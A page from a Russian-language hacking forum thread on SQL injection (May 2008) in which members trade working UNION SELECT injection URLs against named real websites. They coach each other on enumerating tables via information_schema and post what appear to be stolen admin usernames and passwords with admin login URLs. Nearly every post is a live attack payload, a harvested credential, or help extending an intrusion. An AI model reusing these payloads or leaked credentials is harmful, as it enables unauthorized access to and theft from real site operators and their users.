SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
Page 270 of 798
  1. tappakah

    tappakah New Member

    Joined:
    26 Nov 2007
    Messages:
    6
    Likes Received:
    4
    Reputations:
    0
    http://www.bestwine.ru/index.php?action=product_view&id=0x36383327+UNION+SELECT+1,2,username,4,5,6,7,8,9,user_password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+phpbb_users+limit+1,1/*


    Если кто нибудь разбрутит пасс ОдМИНА напишите ЛС плс ))
     
    #5381 tappakah, 9 May 2008
  2. Muhacir

    Muhacir Elder - Старейшина

    Joined:
    5 Oct 2006
    Messages:
    91
    Likes Received:
    51
    Reputations:
    -2
    http://www.timeoutistanbul.com/index.php?eid=18365+order+by+3/*

    http://www.timeoutistanbul.com/index.php?eid=18365+union+select+0,1,2,3+from+users/*


    :confused:
     
    #5382 Muhacir, 9 May 2008
    2 people like this.
  3. neon_fx

    neon_fx Elder - Старейшина

    Joined:
    22 Feb 2008
    Messages:
    74
    Likes Received:
    32
    Reputations:
    0
    Пейте соки Сандора

    http://www.sandora.ua/index.php?id=-6+UNION+SELECT+1,2,database(),4,5,6/*
    sandora
    sandora@localhost
    4.1.22

    Apache/2.0.59
    FreeBSD
    PHP/4.4.8
    mod_ssl/2.0.63 OpenSSL/0.9.7e-p1
     
    #5383 neon_fx, 9 May 2008
  4. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    http://r-est.biz/?r=nj&n=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
    Помогите я узнал токо имена таблиц больше ничего не могу почему то сделать. требуеться пасс,хеш админа
     
    #5384 diznt, 9 May 2008
  5. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    2 diznt

    http://r-est.biz/?r=nj&n=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15, 16,table_name,18+from+information_schema.tables+limit+1,1/*
    takim je makarom iuzae6 information_schema.columns
    i vse tip top :)))
     
    #5385 Gorev, 10 May 2008
  6. Muhacir

    Muhacir Elder - Старейшина

    Joined:
    5 Oct 2006
    Messages:
    91
    Likes Received:
    51
    Reputations:
    -2
    http://r-est.biz/?r=nj&n=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(version(),0x3a,user(),0x3a,database()),14,15,16,17,18+from+users/*

    переберай колонки

    типо

    user
    pass
     
    #5386 Muhacir, 10 May 2008
    Last edited: 10 May 2008
  7. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    2 Muhacir preamo lojkoi v rot...pust' dumaet sam..pro limit i pro vse 4itaet
     
    #5387 Gorev, 10 May 2008
    1 person likes this.
  8. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Gorev просто хотябы сказать мне какие приблизительно колонки перебирать дальше я сам ))) Muhacir . вообщем спсп обоим
     
    #5388 diznt, 10 May 2008
    1 person likes this.
  9. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    2 dizn ti limit poiuzai i vibirai sam columns kakie tebe nujni...no obi4o id, name, pass ili username,password,login etc.....zapros delae6 primerno takoi
    http://r-est.biz/?r=nj&n=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 , 16,column_name,18+from+information_schema.columns+where+table_name=(tablitza kotoraya interesuet)+li mit+1,1/* dalshe igraisea limitom meneay zna4enie pervoi tzifri
     
    #5389 Gorev, 10 May 2008
  10. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    щя заюзаем
     
    #5390 diznt, 10 May 2008
  11. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    imea tablitzi vozmojno nado budet v sql hex peredelivati http://x3k.ru/ tut naide6....vse prosto
     
    #5391 Gorev, 10 May 2008
    1 person likes this.
  12. †c0(aIn?†

    †c0(aIn?† Member

    Joined:
    4 May 2008
    Messages:
    14
    Likes Received:
    5
    Reputations:
    0
    http://www.fastcasual.com/research.php?rc_id=4+uni on+select+1,2,3,4,5--

    atmmarketplace@localhost
    sitedb
    5.0.22

    http://www.fastcasual.com/research.php?rc_id=4+uni on+select+1,2,3,4,5--
    atmmarketplace@localhost
    sitedb
    5.0.22
     
    #5392 †c0(aIn?†, 10 May 2008
  13. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Code:
    http://www.pharma-id.com/thedirectory/profile.asp?id=1+or+1=(SELECT+TOP+1+pName+from+tblWebsiteUsers)--
    так же можно подставить: pPassword, pEmail, pName

    Code:
    http://www.zaishu.com/shop.php?id=-17+union+select+1,2,3,username,password,6,7,8,9,10,11,12,13,14+from+adminrights/*
    admin:zaishu62
     
    #5393 KPOT_f!nd, 10 May 2008
    2 people like this.
  14. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    www.worgas.it
    ===============================================
    scuoladott.psy.unipd.it
    это вроде админы - но где админка - ???
    admin:adm1n
    campana:g1anlu
    agrillo:chragri
    ===============================================
     
    #5394 159932, 10 May 2008
    Last edited: 10 May 2008
    3 people like this.
  15. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.pro-science.asm.md/?lang=ro&view_ev&ev=-90+union+select+1,2,3,4,5,6,7 ,8,9 /*

    version() -5.0.32-Debian_7etch5
    database()-proscience
    user()-
    proscience@localhost

    dal6e bilo v lom razvivat'....
     
    #5395 Gorev, 10 May 2008
  16. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.vreaucredit.md/test/bank_info.php?bank_id=-99999+union+select+1,2,3,4,5,6 ,7,8,9,0/*
    user()-17447@localhost
    version () -5.0.27
    database() -17447
    information_schema.tables prisutstvuet...
     
    #5396 Gorev, 10 May 2008
  17. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    http://www.millennium.net.ua/catalog/?id=-1+union+select+concat(name,':',passwd)+from+users+limit+0,1/*
    http://www.millennium.net.ua/admin/login.php
    artem:vfkmdbyf
     
    #5397 S00pY, 10 May 2008
    1 person likes this.
  18. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    Code:
    http://www.eastsidehockeymanager.net/news.php?view=news&gid=24&id=1261+and+1=2+union+all+select+1,2,concat(user,char(58),password),null,5,null,null,null,null,null,11,null,13,null+from+mysql.user--
    Code:
    http://www.bccracunari.com/katalog/detail.php?id=968+and+1=2+union+all+select+1,2,3,concat(username,char(58),password),5,6,7,8,9,10,11,12+from+user--
    Code:
    http://job.zp.ua/vip.php?id=2+and+1=2+union+all+select+1,2,3,4,concat(login,char(58),passw),6,7+from+admin--
    Code:
    http://www.iteforum.com/sell.php?id=179182+and+1=2+union+all+select+1,2,3,4,concat(username,char(58),password),6,7,8,9,10,11,12,13,14+from+users--
     
    #5398 SWAT, 10 May 2008
    Last edited: 10 May 2008
    1 person likes this.
  19. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.mobilevideonet.com/site/index.php?onderdeelID=1&paginaID=1&itemID=-141+union+select+1,2,3,4,5,6,7,8,9,table_name,1,2,3 ,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0+from+information_schema.tables+limit+50,1/*

    http://www.mobilevideonet.com/admin

    table_name : m_admin
    columns : username, password
    go go go....
     
    #5399 Gorev, 11 May 2008
    1 person likes this.
  20. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.wallpapervillage.com/wallpaper.php?wallpaperid=-21683+union+select+version(),2,3 ,4,5,6/*
     
    #5400 Gorev, 11 May 2008
(You must log in or sign up to post here.)
Page 270 of 798
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.